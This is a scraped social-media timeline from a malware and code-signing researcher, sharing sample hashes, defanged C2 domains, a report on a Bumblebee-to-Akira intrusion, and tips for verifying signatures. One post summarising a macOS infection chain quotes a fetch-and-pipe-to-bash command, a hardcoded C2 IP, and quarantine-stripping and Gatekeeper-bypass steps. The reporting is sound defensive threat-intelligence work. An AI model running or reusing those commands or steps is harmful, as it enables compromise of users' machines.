Squiblydoo

2.1K posts

Squiblydoo banner
Squiblydoo

Squiblydoo

@SquiblydooBlog

Creator of Debloat and https://t.co/tIYqmw6pxt Support: https://t.co/l9kCPRoD2y Join the Debloat/CertGraveyard discord: https://t.co/ZcWIqa6ZA9

The Cert Graveyard Katılım Kasım 2020
98 Takip Edilen4.9K Takipçiler
Squiblydoo
Squiblydoo@SquiblydooBlog·
@Kostastsale Easy solution, just don't log the commandline. (I'm joking.) Nice, thanks for giving us the practical example.
English
1
0
4
129
Kostas
Kostas@Kostastsale·
One of the easiest security risks I ever found was also one of the hardest to get anyone to care about. Many years ago, I was working for an organization where a ticketing application ran on a normal employee workstation. The application passed the credentials for its database through command-line arguments 🤦 Anyone using the workstation could inspect the running process and see them. I raised it as a security risk. The response was basically: “Why would a user ever look there?” I followed up several times. I shared examples. I explained how easily the credentials could be exposed and how threat actors routinely inspect running processes and command lines during discovery. Management was made aware as well. Nothing happened. The credentials remained exposed because nobody believed someone would think to look. The attached Windows Security Event ID 4688 logs show threat actors doing exactly that kind of discovery. They executed this command on ALL servers and endpoints that were online at the time. The command is collecting the command line of every running process. (Assuming you have 4688 logging enabled with the additional audit policy setting to log the command line 😂) Security by obscurity doesn’t work. Patch your holes.
Kostas tweet media
English
2
3
22
2.6K
Squiblydoo
Squiblydoo@SquiblydooBlog·
AI analysis summary: 1. Velto .app (veltod, Swift, signed by "Emil Grigorov" / Team ID WWB7JA7AQV) checks for DYLD_INSERT_LIBRARIES (anti-instrumentation), then beacons to a GitHub raw-content URL (raw[.]githubusercontent[.]com/mgothiclove/pkeys/main/sys.cache) — the C2 domain was hidden as split Swift string constants, not a plain string, and had to be reconstructed from disassembly. 2. That fetches a one-liner (curl endpoint-api-v1[.]com/d/f1b24e | bash). 3. Which resolves through two layers of base64/eval obfuscation to an installer script. 4. Which downloads a second DMG, "CrashReporter.dmg", silently installs it to a hidden /tmp path, strips quarantine, ad-hoc re-signs it to bypass Gatekeeper, and launches it. 5. The final payload masquerades as Apple's crash reporter (com[.]apple.crashreporter), requests Full Disk Access + Desktop/Documents/Downloads entitlements, sets up LaunchAgent-style persistence, and has a hardcoded C2 IP (179.43.166.242) baked into its Info.plist. Full report and components: github.com/Squiblydoo/Rem…
MalwareHunterTeam@malwrhunterteam

One of the related, FUD on VT samples is a Mac sample seen with name "werkbit_installer.dmg", signed using the name "Emil Grigorov"... 🤷‍♂️

English
1
4
13
2.5K
Squiblydoo
Squiblydoo@SquiblydooBlog·
@Dinosn Oh, I was hoping it was more than that lol I know other people were getting hit with rate-limiting of reports, too; so I was hoping for a bigger revamp.
English
0
0
0
40
Nicolas Krassas
Nicolas Krassas@Dinosn·
@SquiblydooBlog They just removed captcha on my latest submission so I don't have to rotate the weird animals around
English
1
0
1
136
Nicolas Krassas
Nicolas Krassas@Dinosn·
Another daily round of GitHub malware spam repo. At least recently GitHub allows easier reporting.
Nicolas Krassas tweet media
English
2
1
9
3.8K
Squiblydoo
Squiblydoo@SquiblydooBlog·
@_subTee @_xpn_ @HackingLZ What crime uses are you seeing for it? I'm just interested to know what is actually being done verses what is hype
English
1
0
2
110
Casey
Casey@_subTee·
@_xpn_ @HackingLZ Crime already beat yall to it. Red teams are slow these days. 😎❤️😀
English
1
0
2
1.6K
Squiblydoo retweetledi
rifteyy
rifteyy@rifteyy·
These Brazilian government compromised sites are easily findable if you look for Inno->NodeJS combo with *.gov.br URL virustotal.com/gui/file/c8702… - Jinan Baolian Deng Network Technology Co., Ltd. virustotal.com/gui/file/8b3f0… - TRADECONSULT AS virustotal.com/gui/file/e0dae… - Xryus Technologies LLC
rifteyy tweet media
rifteyy@rifteyy

"TRADECONSULT AS" signed file coming from government website hxxps://camaraparaguacu.sp.gov.br/doc/xH6jrEMlLp protected with .NET Reactor, drops NodeJS application 💯 app.any.run/tasks/65c36154… virustotal.com/gui/file/8b3f0…

English
0
4
17
1.8K
Squiblydoo
Squiblydoo@SquiblydooBlog·
Volunteers at the Cert Graveyard hunt, analyze, and report code-signing certificates on malware to thwart attacks. We don't often see what happens when it goes unmitigated, but @TheDFIRReport often does. In this report, they report the intrusions from campaigns we had tracked.
The DFIR Report@TheDFIRReport

➡️ New report out today by Jake, Dino, Ahmed Farouk, @MittenSec, @angelo_violetti, and @r3nzsec. From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira 🔎 A user searching for ManageEngine OpManager was led to a fake download site and installed a trojanized MSI. 🐝 That install launched BumbleBee, which brought in AdaptixC2 and gave the threat actor a foothold in the network. 🔐 From there, the actor created privileged accounts, moved to domain controllers and backup servers, dumped credentials, and exfiltrated data. 💥 The intrusion ended with Akira ransomware across the root domain, followed by a return two days later to encrypt a child domain. thedfirreport.com/2026/06/29/fro…

English
0
2
19
1.5K
Squiblydoo
Squiblydoo@SquiblydooBlog·
@LindseyOD123 In today's day and age, I had been worried for a second. 😅"They saw all that and dropped it?" Thanks for the fix. :)
English
1
0
2
49
Lindsey O’Donnell Welch
Lindsey O’Donnell Welch@LindseyOD123·
The DoJ dropped its criminal complaint for alleged Scattered Spider member Peter Stokes. There's quite a bit to unpack here
Lindsey O’Donnell Welch tweet media
English
3
1
12
3.1K
Nightmare Eclipse
Nightmare Eclipse@ChaoticEclipse0·
How court with Microsoft goes every single time...
English
8
10
253
14.6K
Squiblydoo
Squiblydoo@SquiblydooBlog·
@k0ng0x64 Thanks, it always does my heart good to hear it being used. I'd be happy to hear more, but it isn't required.
English
0
0
0
31
Squiblydoo
Squiblydoo@SquiblydooBlog·
FUD HijackLoader 9c0a88ea53c4e0324157542385a1d342101feb51cf7b8cf76e9441376f1f522a Signature: ELH Palkehituse OÜ C2: web-telegram[.]ug Was disguised as a Franz Messenger installer.
Squiblydoo tweet mediaSquiblydoo tweet media
English
3
5
20
1.5K
Squiblydoo
Squiblydoo@SquiblydooBlog·
This is how I like my FUD malware: So many detections that I can't get the engines on the page. 2143baefd0b108fa1f6cfcfa3eb31d87578c6014117768f06bd8544dd02c8adf Signer:"F & P PARTNERS LIMITED" Gets payload from insharedata[.]org/check.php/api/launcher/14/payload?direct=1
Squiblydoo tweet media
English
1
5
19
1.2K
Squiblydoo
Squiblydoo@SquiblydooBlog·
@wessorh @node5 This is not one of interest either: From the two images below, both VirusTotal (which uses sigcheck) and osslsigncode see the certificate as invalid. The file's computed hash does not match the hash associated with the certificate, indicating that it is not properly signed.
Squiblydoo tweet mediaSquiblydoo tweet media
English
0
0
0
28
Squiblydoo
Squiblydoo@SquiblydooBlog·
Yes and no. Yes, in as much as this file is being used maliciously. No, in that this certificate is legitimately issued to Connectwise, the makers of ScreenConnect. It is a legitimately signed remote access tool. Sometimes actors sign files that will load their own version of ScreenConnect: those can be interesting, such as this one: a fake DocuSign file which loads ScreenConnect: virustotal.com/gui/file/018b8…
English
0
0
0
37
Squiblydoo
Squiblydoo@SquiblydooBlog·
@wessorh @node5 No, there is a high probability that they aren't validly signed. Actors still get some benefit from invalid signatures, but they aren't interesting in regards to the data I track. We often see a lot of self-signed certificates, but these aren't really interesting.
English
2
0
0
33
wessorh
wessorh@wessorh·
@SquiblydooBlog @node5 I found a couple hundred signed mailware in todays feed, most of the signature checks fail when checked with ./osslsigncode, would you like them?
English
1
0
0
19
Squiblydoo
Squiblydoo@SquiblydooBlog·
I suppose there are a number of ways to do this, depends on your pipeline. Technically, you just need to check the PE's Optional Header Security Data Directory. This Optional Header indicates that there is a signature: it'll specify it's location and size. This won't tell you if it is a valid certificate though. Signify, PEfile, or LIEF would be good tools to help do this too, you should be able to use them for a quick check to see if a file is signed. The rest of the pipeline, such as checking validty and such would require more discussion and building it out.
English
2
0
0
39
Squiblydoo
Squiblydoo@SquiblydooBlog·
@wessorh @node5 My go-to tool is osslsigncode. The main command you need is "osslsigncode verify -in <file name>" . The output isn't as clear as I would like, but it checks the CRL, checks if it is validly signed, etc.
English
2
0
1
42
wessorh
wessorh@wessorh·
@node5 @SquiblydooBlog What are some good tools to validate pe signed files that runs on linux. While I have tons of pe malware all the analysis happens on linux
English
1
0
0
44